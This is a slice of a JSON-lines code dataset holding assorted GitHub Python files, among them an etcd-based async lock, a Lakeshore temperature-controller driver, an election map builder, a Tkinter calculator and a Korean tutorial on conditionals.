main()\n","repo_name":"keleven-uk/pyKlock","sub_path":"pyDigitalKlock_pygubu/src/pyDigitalKlock.py","file_name":"pyDigitalKlock.py","file_ext":"py","file_size_in_byte":10050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39935506457","text":"# -*- coding: utf-8 -*-\nimport os\nfrom knowledge.reader import data\n\n\nif __name__ == '__main__':\n BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n save_file = os.path.join(BASE_DIR, 'words/genre.txt')\n genre = []\n for dic in data.values():\n synonyms = list(dic.keys())[0].split(',')\n genre.extend(synonyms)\n\n with open(save_file, 'w') as f:\n f.write('\\n'.join(set(genre)))","repo_name":"Hironsan/HotPepperGourmetDialogue","sub_path":"training_data_generator/scripts/genre_maker.py","file_name":"genre_maker.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":275,"dataset":"github-code","pt":"21"} +{"seq_id":"28496499169","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 19 19:03:33 2018\n\n@author: Srikrishna.Sadula\n\"\"\"\n\nfrom pyspark import SparkConf, SparkContext\nconf = SparkConf().setMaster(\"local\").setAppName(\"My App\")\nsc = SparkContext(conf = conf)\n\nlines = sc.textFile(\"D:\\\\projects\\\\machinelearning\\\\mltutor\\\\spark\\\\src\\\\readme.txt\")\nlines.first()\npythonLines = lines.filter(lambda line: \"Python\" in line)\npythonLines.first()\n\nsc.stop()","repo_name":"krishxx/spark","sub_path":"src/spark2_7.py","file_name":"spark2_7.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43868566211","text":"# !/usr/bin/env python3\n# -*- coding:utf-8 -*-\n#\n# Author: Flyaway - flyaway1217@gmail.com\n# Blog: zhouyichu.com\n#\n# Python release: 3.4.5\n#\n# Date: 2017-02-21 10:29:21\n# Last modified: 2017-02-21 10:42:39\n\n\"\"\"\nCalculate the statistics information of the given data set.\n\"\"\"\n\n\ndef stat(path):\n with open(path, encoding='latin-1') as f:\n word_count = 0\n unique_words = set()\n sent_count = 0\n for line in f:\n if len(line.strip()) != 0:\n word_count += 1\n word = line.strip().split()[0]\n unique_words.add(word)\n else:\n sent_count += 1\n print('In the file {a}:\\n'.format(a=path))\n print('There are {a} sentences.'.format(a=sent_count))\n print('There are {a} words in total.'.format(a=word_count))\n print('There are {a} unique words.'.format(a=str(len(unique_words))))\n\nif __name__ == '__main__':\n # path = '../data/esp.train'\n # path = '../data/esp.testa'\n path = '../data/esp.testb'\n stat(path)\n","repo_name":"flyaway1217/CS-6390-Information-Extraction","sub_path":"ner/source/stat.py","file_name":"stat.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4553064809","text":"from tkinter import *\n\nif __name__ == \"__main__\":\n def add():\n s1 = int(num01.get())\n s2 = int(num02.get())\n\n result[\"text\"] = s1 + s2\n\n def sub():\n s1 = int(num01.get())\n s2 = int(num02.get())\n\n result[\"text\"] = s1 - s2\n\n def mul():\n s1 = int(num01.get())\n s2 = int(num02.get())\n\n result[\"text\"] = s1 * s2\n\n def div():\n s1 = int(num01.get())\n s2 = int(num02.get())\n\n result[\"text\"] = s1 / s2\n\n calc = Tk()\n calc.title(\"Calculator\")\n calc.geometry(\"160x100\")\n\n Label(calc, text=\"수 - 1\").grid(row=0)\n Label(calc, text=\"수 - 2\").grid(row=1)\n Label(calc, text=\"결과\").grid(row=2)\n\n num01 = Entry(calc, width=20)\n num01.grid(row=0, column=1)\n\n num02 = Entry(calc, width=20)\n num02.grid(row=1, column=1)\n\n result = Label(calc, relief=\"raised\", width=17, bd=2, bg=\"green\")\n result.grid(row=2, column=1)\n\n Button(calc, text=\"+\", width=2, command=add).place(x=30, y=70)\n Button(calc, text=\"-\", width=2, command=sub).place(x=60, y=70)\n Button(calc, text=\"*\", width=2, command=mul).place(x=90, y=70)\n Button(calc, text=\"/\", width=2, command=div).place(x=120, y=70)\n\n calc.mainloop()\n","repo_name":"rivercity310/study","sub_path":"basic/linear_algebra/tkinter_ex4.py","file_name":"tkinter_ex4.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"18319293138","text":"from lib.read_excel import *\nfrom config.config import *\n\n\ndef get_data_list(sheet_name):\n if sheet_name == \"client_info\":\n client_data_list = excel_to_list(os.path.join(data_path, \"loan_info.xlsx\"), sheet_name)\n return client_data_list\n elif sheet_name == \"login_user\":\n user_data_list = excel_to_list(os.path.join(data_path, \"loan_info.xlsx\"), sheet_name)\n return user_data_list\n elif sheet_name == \"contact_info\":\n contact_data_list = excel_to_list(os.path.join(data_path, \"loan_info.xlsx\"), sheet_name)\n return contact_data_list\n","repo_name":"restart759/Test_framework","sub_path":"object/baseuse/get_data_list.py","file_name":"get_data_list.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19944478071","text":"import pathlib\nimport sys\nimport pandas as pd\nfrom slugify import slugify\nimport numpy as np\nfrom map_basics import (\n create_folium_choropleth,\n load_json_file,\n create_tool_tip,\n read_csv_results,\n)\n\n\nVALGKRETS_DIR = pathlib.Path('valgkretser')\nVALGKRETS = 'krets-{}.geojson'\n\n\ndef _load_geojson_file(kommune_id):\n \"\"\"Load data from a geojson file.\"\"\"\n geojson_file = VALGKRETS_DIR.joinpath(\n VALGKRETS.format(kommune_id)\n )\n return load_json_file(geojson_file)\n\n\ndef get_center(features):\n \"\"\"Calculate the geometric center for some features.\"\"\"\n averages = []\n for feature in features:\n for polygon in feature['geometry']['coordinates']:\n coord = np.array(polygon)\n averages.append(np.average(coord, axis=0))\n averages = np.array(averages)\n return np.average(averages, axis=0)\n\n\ndef extract_data(results, kommune_id, party):\n \"\"\"Extract the required data.\"\"\"\n kommune_data = results[results['Kommunenummer'] == kommune_id]\n parti_data = kommune_data[kommune_data['Partinavn'] == party]\n raw_data = {}\n kretser = []\n for _, row in parti_data.iterrows():\n raw_data[row['Stemmekretsnummer']] = {\n 'krets': row['Stemmekretsnavn'],\n 'partinavn': row['Partinavn'],\n 'oppslutning': row['Oppslutning prosentvis'],\n 'kommunenavn': row['Kommunenavn'],\n }\n kretser.append(row['Stemmekretsnavn'])\n all_same = len(kretser) == 1 and kretser[0] == 'Hele kommunen'\n return raw_data, all_same\n\n\ndef get_geojson_data(result_file, party, kommune_id):\n \"\"\"Read in result files are produce corresponding geojson data.\"\"\"\n results = read_csv_results(result_file)\n kommune_data = results[results['Kommunenummer'] == kommune_id]\n kommune_navn = kommune_data['Kommunenavn'].tolist()[0]\n print('Reading data for \"{}\" in \"{}\"'.format(party, kommune_navn))\n raw_data, all_same = extract_data(results, kommune_id, party)\n geojson_data = _load_geojson_file(kommune_id)\n # Check that we have data for all features:\n for feature in geojson_data['features']:\n if not all_same:\n krets = str(\n feature['properties']['valgkretsnummer']\n ).rjust(4, '0')\n else:\n krets = '0000'\n feature['properties']['oppslutning'] = '({:4.2f} %)'.format(\n raw_data[krets]['oppslutning']\n )\n feature['properties']['partinavn'] = raw_data[krets]['partinavn']\n feature['properties']['krets'] = krets\n map_settings = {\n 'title': kommune_navn,\n 'party': party,\n 'center': get_center(geojson_data['features'])[::-1],\n 'zoom': 10,\n 'value_key': 'oppslutning',\n 'tooltip': create_tool_tip(\n ('valgkretsnavn', 'partinavn', 'oppslutning'),\n ('Krets:', 'Parti', 'Oppslutning (%)'),\n labels=False,\n )\n }\n return geojson_data, raw_data, map_settings\n\n\ndef main(result_file, party, kommune_id):\n \"\"\"Read input file and create the map.\"\"\"\n geojson_data, results, map_settings = get_geojson_data(\n result_file, party, kommune_id\n )\n the_map = create_folium_choropleth(geojson_data, results, map_settings)\n\n out = 'stemmekrester-{}-kommune-{}-{}.html'.format(\n slugify(party), kommune_id, slugify(map_settings['title'])\n )\n print('Writing map to \"{}\"'.format(out))\n the_map.save(out)\n\n\nif __name__ == '__main__':\n main(sys.argv[1], sys.argv[2], sys.argv[3])\n","repo_name":"andersle/valg","sub_path":"kart_parti_i_kommune.py","file_name":"kart_parti_i_kommune.py","file_ext":"py","file_size_in_byte":3516,"program_lang":"python","lang":"no","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10177190373","text":"import numpy as np\nimport pandas as pd\nimport plotly.express as px\nfrom sklearn.metrics import recall_score\n\nPOSITIVE_COLOR = \"#1E90FF\"\nNEGATIVE_COLOR = \"#FF6347\"\nLABELED_COLOR = \"#78B639\"\nUNLABELED_COLOR = \"#A9A9A9\"\n\n\ndef plot_x_y(xs: np.array, ys: np.array):\n df = pd.DataFrame.from_dict(\n {\n \"x_0\": xs[:, 0],\n \"x_1\": xs[:, 1],\n \"y\": [\"Positive\" if y == 1 else \"Negative\" for y in ys],\n }\n )\n return px.scatter(\n df,\n x=\"x_0\",\n y=\"x_1\",\n color=\"y\",\n color_discrete_map={\"Negative\": NEGATIVE_COLOR, \"Positive\": POSITIVE_COLOR},\n )\n\n\ndef plot_x_y_proba(xs: np.array, ys_prob: np.array):\n df = pd.DataFrame.from_dict(\n {\n \"x_0\": xs[:, 0],\n \"x_1\": xs[:, 1],\n \"y\": ys_prob,\n }\n )\n return px.scatter(\n df,\n x=\"x_0\",\n y=\"x_1\",\n color=\"y\",\n color_continuous_scale=[NEGATIVE_COLOR, POSITIVE_COLOR],\n range_color=[0.0, 1.0],\n )\n\n\ndef plot_x_y_list(xs: np.array, ys_list: list):\n df = pd.DataFrame(index=[], columns=[\"x_0\", \"x_1\", \"y\", \"clf_index\"])\n for i in range(len(ys_list)):\n df_ = pd.DataFrame.from_dict(\n {\n \"x_0\": xs[:, 0],\n \"x_1\": xs[:, 1],\n \"y\": [\"Positive\" if y == 1 else \"Negative\" for y in ys_list[i]],\n \"clf_index\": i,\n }\n )\n df = pd.concat([df, df_])\n return px.scatter(\n df,\n x=\"x_0\",\n y=\"x_1\",\n facet_row=\"clf_index\",\n color=\"y\",\n color_discrete_map={\"Negative\": NEGATIVE_COLOR, \"Positive\": POSITIVE_COLOR},\n )\n\n\ndef plot_x_s(xs: np.array, ss: np.array):\n df = pd.DataFrame.from_dict(\n {\n \"x_0\": xs[:, 0],\n \"x_1\": xs[:, 1],\n \"s\": [\"Positive\" if s == 1 else \"Unlabeled\" for s in ss],\n }\n )\n return px.scatter(\n df,\n x=\"x_0\",\n y=\"x_1\",\n color=\"s\",\n color_discrete_map={\"Unlabeled\": UNLABELED_COLOR, \"Positive\": LABELED_COLOR},\n )\n\n\ndef plot_x_s_proba(xs: np.array, ss_prob: np.array):\n df = pd.DataFrame.from_dict(\n {\n \"x_0\": xs[:, 0],\n \"x_1\": xs[:, 1],\n \"s\": ss_prob,\n }\n )\n return px.scatter(\n df,\n x=\"x_0\",\n y=\"x_1\",\n color=\"s\",\n color_continuous_scale=[UNLABELED_COLOR, LABELED_COLOR],\n range_color=[0.0, 1.0],\n )\n\n\ndef f1_prime(ys: np.array, ys_hat: np.array):\n r = recall_score(ys, ys_hat)\n ratio_p = len(ys_hat[ys_hat == 1]) / len(ys_hat)\n if ratio_p == 0.0:\n return 0.0\n else:\n return r**2 / ratio_p\n","repo_name":"hkiyomaru/pu-learning","sub_path":"notebooks/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2688,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"21"} +{"seq_id":"28081601635","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\netcd 异步 服务发现 异步 锁\n\"\"\"\nimport uuid\nfrom collections import namedtuple, defaultdict\nimport etcd\nimport threading\nimport logging\nfrom tornado.ioloop import IOLoop\nfrom tornado import gen\nfrom tornado.concurrent import Future\nfrom singleton import Singleton\n\n\nclass EtcdProcess(object):\n \"\"\"\"\n etcd 线程\n \"\"\"\n\n def __init__(self, watch_root, etcd_servers, sentry=None):\n \"\"\"\n init\n :param str watch_root: 监控的根目录\n :param tuple etcd_servers: etcd 服务器列表\n :param dict sentry: sentry object\n \"\"\"\n self.watch_root = watch_root\n self.client = etcd.Client(host=etcd_servers, allow_reconnect=True)\n self.sentry = sentry\n self._local_index = None\n self.key_process_dict = dict()\n self.thread = None\n\n def run(self):\n \"\"\"\n 循环阻塞获得etcd key的变化\n \"\"\"\n while True:\n try:\n response = self.client.watch(self.watch_root, recursive=True, timeout=0, index=self._local_index)\n self._local_index = response.modifiedIndex + 1\n\n etcd_key = response.key\n dir_list = etcd_key.split(\"/\")\n process_dir = dir_list[2]\n\n if self.key_process_dict.get(process_dir):\n response.dir_list = dir_list[3:]\n self.key_process_dict[process_dir](response)\n\n except Exception as exp:\n logging.error(\"tornado etcd thread error: %s\", str(exp))\n if self.sentry:\n self.sentry.captureException(exc_info=True)\n\n def _start_thread(self):\n \"\"\"\n 开启线程并确保线程可用\n :return:\n \"\"\"\n if not self.thread or not self.thread.is_alive():\n t = threading.Thread(target=self.run)\n self.thread = t\n t.setDaemon(True)\n t.start()\n logging.info(\"tornado etcd start thread\")\n\n def register(self, key, process):\n \"\"\"\n 注册处理器 eg: key=\"lock\" process=lock_process\n :param str key: 关注的目录\n :param func process: 处理器\n :return:\n \"\"\"\n if key in self.key_process_dict:\n raise RuntimeError(\"tornado etcd key: %s has existed\" % key)\n self.key_process_dict[key] = process\n\n\nclass ProcessBase(Singleton):\n \"\"\"\n 处理器基类\n \"\"\"\n\n def __init__(self, watch_root, etcd_servers, sentry=None):\n \"\"\"\n init\n :param key:\n :param etcd_servers:\n :param sentry:\n \"\"\"\n self.watch_root = watch_root\n self.etcd_process = EtcdProcess(watch_root, etcd_servers, sentry)\n self.client = etcd.Client(host=etcd_servers, allow_reconnect=True)\n self.watch_dict = defaultdict(list)\n self.etcd_process.register(self.base_key, self.process)\n\n def get_full_key(self, key):\n \"\"\"\n 获得带路径的key值 eg: key = \"read_lock\" return /base_dir/lock/read_lock\n :param str key: 部分key值\n :return: \"获得带路径的key值\"\n \"\"\"\n dir_list = self.watch_root.split(\"/\")\n dir_list.extend([self.base_key, key])\n return \"/\".join(dir_list)\n\n def test_and_set(self, key, value, prev_value, ttl=None):\n \"\"\"\n etcd test_and_set 封装\n :param str key: 部分key值\n :param value: 设置的值\n :param prev_value: 设置前的值\n :param ttl: 过期时间\n :return:\n \"\"\"\n key = self.get_full_key(key)\n return self.client.test_and_set(key, value, prev_value, ttl)\n\n def set(self, key, value, ttl=None, dir=False, append=False, **kwdargs):\n \"\"\"\n etcd set 封装\n :param key: 部分key值\n :param value: 设置的值\n :param ttl: 过期时间\n :param dir: 目录\n :param append: \n :param kwdargs: \n :return: \n \"\"\"\n key = self.get_full_key(key)\n return self.client.write(key, value, ttl, dir, append, **kwdargs)\n\n def get(self, key, **kwdargs):\n \"\"\"\n etcd get 封装\n :param key: \n :param kwdargs: \n :return: \n \"\"\"\n key = self.get_full_key(key)\n return self.client.read(key, **kwdargs)\n\n def process(self, etcd_value):\n \"\"\"\n 处理器\n :param etcd_value:\n :return:\n \"\"\"\n raise NotImplementedError\n\n\nclass WatchProcess(ProcessBase):\n \"\"\"\n 监控关键字,关键字不变化,协程阻塞,关键字有变化,协程继续执行\n \"\"\"\n\n def __init__(self, watch_root, etcd_servers, sentry=None):\n \"\"\"\n init\n :param key: \n :param etcd_servers: \n :param sentry: \n \"\"\"\n self.base_key = \"watch\"\n super(WatchProcess, self).__init__(watch_root, etcd_servers, sentry)\n\n def watch_key(self, key):\n \"\"\"\n 监控关键字,关键字不变化,协程阻塞,关键字有变化,协程继续执行\n :param str key: 监控的关键字\n :return:\n \"\"\"\n self.etcd_process._start_thread()\n\n future = Future()\n self.watch_dict[key].append(future)\n return future\n\n def process(self, etcd_res):\n \"\"\"\n 监控关键字处理器\n :param etcd_res:\n :return:\n \"\"\"\n etcd_key = etcd_res.dir_list[0]\n etcd_value = etcd_res.value\n\n if etcd_key in self.watch_dict.keys():\n future_list = self.watch_dict[etcd_key]\n # 唤醒所有等待的watch\n for future in future_list:\n future.set_result((True, etcd_value))\n\n del self.watch_dict[etcd_key]\n\n\nclass EternalWatchProcess(ProcessBase):\n \"\"\"\n 监控关键字,关键字不变化,协程阻塞,关键字有变化,协程继续执行\n \"\"\"\n\n def __init__(self, watch_root, etcd_servers, sentry=None):\n \"\"\"\n init\n :param key:\n :param etcd_servers:\n :param sentry:\n \"\"\"\n self.base_key = \"eternal_watch\"\n super(EternalWatchProcess, self).__init__(watch_root, etcd_servers, sentry)\n\n def get_key(self, key):\n \"\"\"\n 监控关键字,关键字不变化,协程阻塞,关键字有变化,协程继续执行\n :param str key: 监控的关键字\n :return:\n \"\"\"\n self.etcd_process._start_thread()\n\n if not self.watch_dict.get(key):\n # etcd 中必须提前设置该key,否则报错\n etcd_res = self.get(key)\n self.watch_dict[key] = etcd_res.value\n\n return self.watch_dict[key]\n\n def process(self, etcd_res):\n \"\"\"\n 监控关键字处理器\n :param etcd_res:\n :return:\n \"\"\"\n etcd_key = etcd_res.dir_list[0]\n etcd_value = etcd_res.value\n\n if etcd_key in self.watch_dict.keys():\n # 更新值\n self.watch_dict[etcd_key] = etcd_value\n\n\nclass LockProcess(ProcessBase):\n \"\"\"\n 锁\n \"\"\"\n UNLOCK = \"no_lock\"\n Lock_Item = namedtuple(\"Lock_Item\", (\"future\", \"token\", \"ttl\"))\n\n def __init__(self, watch_root, etcd_servers, sentry=None):\n \"\"\"\n init\n :param key:\n :param etcd_servers:\n :param sentry:\n \"\"\"\n self.base_key = \"lock\"\n self.wait_lock_dict = defaultdict(list)\n self.locking_dict = dict()\n super(LockProcess, self).__init__(watch_root, etcd_servers, sentry)\n\n def process(self, etcd_res):\n \"\"\"\n 锁处理器\n :param etcd_res:\n :return:\n \"\"\"\n etcd_key = etcd_res.dir_list[0]\n etcd_value = etcd_res.value\n\n wait_lock_list = self.wait_lock_dict[etcd_key]\n\n # 解锁状态 或者 锁超时 进行解锁操作\n if etcd_value in (self.UNLOCK, None) and wait_lock_list:\n lock_item = wait_lock_list[0]\n lock_flag = self._lock(etcd_key, lock_item)\n\n if lock_flag:\n logging.info(\"tornado etcd lock sucess key:%s\", etcd_key)\n lock_item.future.set_result((True, lock_item.token))\n self.locking_dict[etcd_key] = lock_item\n self.wait_lock_dict[etcd_key].pop(0)\n\n # 锁超时\n elif not etcd_value:\n if self.locking_dict.get(etcd_key):\n ttl = self.locking_dict[etcd_key].ttl\n del self.locking_dict[etcd_key]\n raise RuntimeError(\"key: %s ttl: %s,lock time out\" % (etcd_key, ttl))\n\n def _lock(self, key, lock_item):\n \"\"\"\n 尝试加锁\n :param str key: 关键字\n :param str lock_uuid: lock码\n :return: bool 加锁是否成功\n \"\"\"\n token = lock_item.token\n ttl = lock_item.ttl\n try:\n self.test_and_set(key, token, self.UNLOCK, ttl)\n return True\n\n except etcd.EtcdKeyNotFound:\n try:\n self.set(key, token, prevExist=False, recursive=True, ttl=ttl)\n return True\n except etcd.EtcdAlreadyExist as e:\n logging.debug(e)\n return False\n\n except etcd.EtcdCompareFailed as e:\n logging.debug(e)\n return False\n\n def lock(self, key, ttl=None):\n \"\"\"\n 加锁\n :param str key: 关键字\n :param int ttl: 过期时间\n :return: Future object\n \"\"\"\n self.etcd_process._start_thread()\n future = Future()\n\n token = uuid.uuid4().hex\n lock_item = self.Lock_Item(future, token, ttl)\n lock_flag = self._lock(key, lock_item)\n if lock_flag:\n self.locking_dict[key] = lock_item\n future.set_result((True, token))\n else:\n self.wait_lock_dict[key].append(lock_item)\n return future\n\n def unlock(self, key, token):\n \"\"\"\n 解锁\n :param key:\n :return:\n \"\"\"\n try:\n self.test_and_set(key, self.UNLOCK, token)\n logging.info(\"tornado etcd unlock key: %s, token: %s\", key, token)\n return True\n except (etcd.EtcdCompareFailed, etcd.EtcdKeyNotFound) as e:\n logging.error(\"tornado etcd unlock before lock %s\", e)\n return False\n\n\nif __name__ == \"__main__\":\n ETCD_SERVERS = ((\"127.0.0.1\", 2379),)\n etcd_watch = LockProcess(\"/watch\", ETCD_SERVERS, None)\n\n\n def start_loop(function_list):\n \"\"\"\n 仅供脚本使用\n :param function_list:\n :return:\n \"\"\"\n io_loop = IOLoop.instance()\n future_list = []\n\n def stop(future):\n future_list.remove(future)\n if not future_list:\n io_loop.stop()\n\n for function in function_list:\n future = function()\n future_list.append(future)\n io_loop.add_future(future, lambda x: stop(x))\n\n io_loop.start()\n\n\n @gen.coroutine\n def test():\n # res = yield etcd_watch.get(\"/watch/a\")\n\n # res = yield etcd_watch.watch(\"/watch/aa\")\n\n # res = yield etcd_watch.get(\"/watch/aaa\")\n\n # a = \"hello\"\n # a += \"q\"\n import time\n start_time = time.time()\n flag, token = yield etcd_watch.lock(\"ba\")\n logging.error(token)\n\n def tmp():\n f = Future()\n IOLoop.current().call_later(1, lambda: f.set_result(None))\n return f\n\n yield tmp()\n res = etcd_watch.unlock(\"ba\", token)\n logging.error(\"执行时间:\")\n logging.error(time.time() - start_time)\n raise gen.Return(res)\n\n\n start_loop([test, test, test, test, test, test, test, test, test, test, test, test, ])\n # IOLoop.current().run_sync(test)\n # def main():\n # IOLoop.current().run_sync(test)\n #\n #\n # from multiprocessing import Process\n #\n # for _ in range(2):\n # p = Process(target=main)\n # p.daemon = False\n # p.start()\n","repo_name":"h094071/utils","sub_path":"etcd_lib/tornado_etcd.py","file_name":"tornado_etcd.py","file_ext":"py","file_size_in_byte":12064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8341383654","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSet of functions to control Lakeshore 340 temperature controller.\n\nPython 3.7\n\n@author: Carlos galdino\ngaldino@ifi.unicamp.br\n\"\"\"\n\nimport KUSB_488A_communication as gpib\n\n\nclass Lakeshore_340():\n \"\"\"Lakeshore 340 temperature controller.\"\"\"\n\n def __init__(self, address):\n self.address = address\n\n # Configure Control Loop Parameters\n gpib.send('\\\"CSET 1 A 1 on\\\"', self.address)\n self.input = 'A'\n self.controlLoop = '1'\n\n\n def heater_range(self, *args):\n \"\"\"Set and get heater range\n\n heater_range() >> Query Heater Range.\n heater_range(0-5) >> Configure Heater Range (from 0 to 5).\n\n :params range: heater range.\n\n :Return: the heater range.\n \"\"\"\n # if len(args)==1:\n # gpib.send('\\\"Range ' + str(args[0]) + '\\\"', self.address)\n # else:\n # gpib.send('RANGE?', self.address)\n # return float(gpib.receive(self.address))\n if len(args)==1:\n gpib.send('\\\"RANGE ' + str(args[0]) + '\\\"', self.address)\n else:\n gpib.send('RANGE?', self.address)\n try:\n return float(gpib.receive(self.address))\n except ValueError:\n print('ERROR: Communication lost.')\n\n\n def heater_output(self):\n \"\"\"Get Heater Output (0 to 100%).\n\n :Return: heater output in percent.\n \"\"\"\n # gpib.send('HTR?', self.address)\n # return float(gpib.receive(self.address))\n if len(args)==1:\n gpib.send('\\\"MOUT ' + self.controlLoop + ', ' + str(args[0]) + '\\\"', self.address)\n else:\n gpib.send('HTR?', self.address)\n try:\n return float(gpib.receive(self.address))\n except ValueError:\n print('ERROR: Communication lost.')\n\n def get_setpoint(self):\n \"\"\"Get Control Loop Setpoint.\n\n :Return: Returns the control loop setpoint.\n \"\"\"\n gpib.send('\\\"SETP? ' + self.controlLoop + '\\\"', self.address)\n # return float(gpib.receive(self.address))\n try:\n return float(gpib.receive(self.address))\n except ValueError:\n print('ERROR: Communication lost.')\n\n def t(self, *args):\n \"\"\"Set/get temperature.\n\n t() queries temperature.\n t(setpoint) sets the setpoint temperature of the selected input.\n\n :params setpoint: temperature setpoint in Kelvin.\n \"\"\"\n\n # if len(args)==1:\n # gpib.send('\\\"SETP ' + self.controlLoop + ', ' + str(args[0]) + '\\\"', self.address)\n # else:\n # gpib.send('\\\"KRDG? ' + self.input + '\\\"', self.address)\n # return float(gpib.receive(self.address))\n\n if len(args)==1:\n gpib.send('\\\"SETP ' + self.controlLoop + ', ' + str('{:.3f}'.format(float(args[0]))) + '\\\"', self.address)\n else:\n gpib.send('\\\"KRDG? ' + self.input + '\\\"', self.address)\n try:\n return float(gpib.receive(self.address))\n except ValueError:\n print('ERROR: Communication lost.')\n","repo_name":"cwgaldino/amreft-m4p","sub_path":"amreft-mp4/Lakeshore.py","file_name":"Lakeshore.py","file_ext":"py","file_size_in_byte":3130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35912307482","text":"# 먼저 사용자 입력 필수\n# input()\n\nname = input('enter your name : ')\ngray = input('enter your grade : ')\ncompany = input('enter your company : ')\n\nprint(name, grade, company)\n\nscore = int(input('Enter your score: '))\nprint(score)\n\nprint(type(score)) # int\n\n\n# 파이썬 제어문\n# if, if ~else, if ~ elif ~ else\n# bool True : 0 이 아닌 수, 문자, 데이터가 있는 리스트, 튜플, 딕셔너리\nif not False :\n print('Bad') # Bad\n\nif False :\n print(\"Bad\")\nelse :\n print(\"good\") # good\n\n# 아래의 값이 3의 배수인지 5의 배수인지 아닌지 검정하고 싶다면?\nnumber = 3\nif number % 3 == 0 or number % 5 == 0:\n print(\"{}은 3 또는 5의 배수입니다\".format(number))\n\nelse :\n print('{}은 3과 5의 배수가 아닙니다'.format(number))\n\n\n# 윤년의 조건\n# 4의 배수이고 100의 배수가 아니거나 400의 배수일 때\n# if 구문을 사용하여 연도와 월을 입력받아서 월의 마지막 일을 출력하라\n\nfrom datetime import date, datetime,timedelta\n\n\n\nyear = int(input('년도를 입력하세요: '))\nmonth = int(input('월을 입력하세요: '))\nyear_month = [31,28,31,30,31,30,31,31,30,31,30,31]\nleap_year_month = [31,29,31,30,31,30,31,31,30,31,30,31]\n\n\n\nif (year % 4 == 0 and year % 100 != 0) :\n print('해당 월의 마지막 날: {} '.format(leap_year_month[month-1]))\nelif (year % 400 == 0):\n print('해당 월의 마지막 날:{} '.format(leap_year_month[month-1]))\nelse :\n print('윤년이 아닙니다.'.format(year_month[month-1]))\n\n\n\n# 중첩 조건문\n# A학점이면서 95 이상의 점수면 장학금 100%\n# A학점이면서 90 이상의 점수면 장학금 90%\n# A학점이 아니면 장학금 50%\n\ngrade=input('학점 입력: ')\ntotal=int(input('점수 입력: '))\n\nif grade == 'A':\n if total >= 95 :\n print(\"장학금 100%\")\n else :\n print(\"장학금 95%\")\nelse :\n print(\"장학금 50%\")\n\n\n\narea = ['서울','부산','제주']\nregion = '수원'\n\nif region in area :\n pass\nelse :\n print('{} 지역은 포함되지 않습니다'.format(region))\n\n\nmydict = {'서울':100, '광주':200}\nregion = '부산'\nif region in mydict:\n print('키 값이 존재합니다')\nelse:\n print('키 값이 존재하지 않습니다')\n\n\nnum = 9\nresult = 0\nif num >= 5 :\n result = num * 2\nelse:\n result = num + 2\nprint(result)\n\n# 삼항 연산자\nresult = num*2 if (num>=5) else num +2\nprint(result)\n\n\n# 참, 거짓 판별 종류\ncity =' '\nif city :\n print(city)\nelse :\n print('Please')\n\nmoney = ''\nif money :\n print('맛점')\nelse :\n print('ㅠㅡㅠ')\n\n# 사용자로부터 하나의 값을 입력받아 해당 값에 20을 뺀 값을 출력\n# 단, 출력 값의 범위는 0~225이다\n# 예를 들어 결과값이 0보다 작은 값이 되는 경우 0을 출력하고 255보다 큰 값이 되는 경우 255를 출력\nnum = int(input('숫자입력: '))\n\nif num <0 :\n print('0')\nelif 0 None:\n for role in roles:\n role = Role(name=role)\n session.add(role)\n try:\n session.commit()\n except IntegrityError:\n pass\n\n\n@create_sync_session\ndef downgrade(session: Session = None) -> None:\n for role in roles:\n session.execute(\n sa.delete(Role)\n .where(Role.name == role)\n )\n session.commit()\n","repo_name":"ArtsemDev/bh_exam_57","sub_path":"alembic/versions/23464356d0f3_insert_roles.py","file_name":"23464356d0f3_insert_roles.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"45659226405","text":"import numpy as np\n\n# https://github.com/allenwind/text-color-render\n\n# ANSI escape code\nansi_code_ids = [15, 224, 217, 210, 203, 9, 160, 124, 88]\nlength = len(ansi_code_ids)\n\nhexcolors = [\n \"#f5f5ff\",\n \"#ffe0e0\",\n \"#ffb6b6\",\n \"#ff8d8d\",\n \"#ff6363\",\n \"#ff3939\",\n \"#ff1010\",\n \"#f20000\",\n \"#dd0000\",\n \"#c80000\",\n \"#b40000\",\n \"#9f0000\",\n \"#8a0000\",\n]\nhex_lenght = len(hexcolors)\n\ntemplate = \"\\033[38;5;{value}m{string}\\033[0m\"\ndef print_color_text(text, ws, end=False):\n ws = np.array(ws)\n ws = (ws - np.min(ws)) / (np.max(ws) - np.min(ws)) * 0.99\n for string, w in zip(text, ws):\n vid = int(w * length)\n value = ansi_code_ids[vid]\n print(template.format(string=string, value=value), end=\"\")\n if end:\n print()\n\nmarkdown_template = '{}'\ndef render_color_markdown(text, ws):\n ws = np.array(ws)\n ws = (ws - np.min(ws)) / (np.max(ws) - np.min(ws)) * 0.99\n ss = []\n for string, w in zip(text, ws):\n i = int(w * hex_lenght)\n ss.append(markdown_template.format(hexcolors[i], string))\n return \"\".join(ss)\n\nif __name__ == \"__main__\":\n # for testing\n import string\n text = string.ascii_letters\n print_color_text(text, np.arange(len(text)))\n print(render_color_markdown(text, 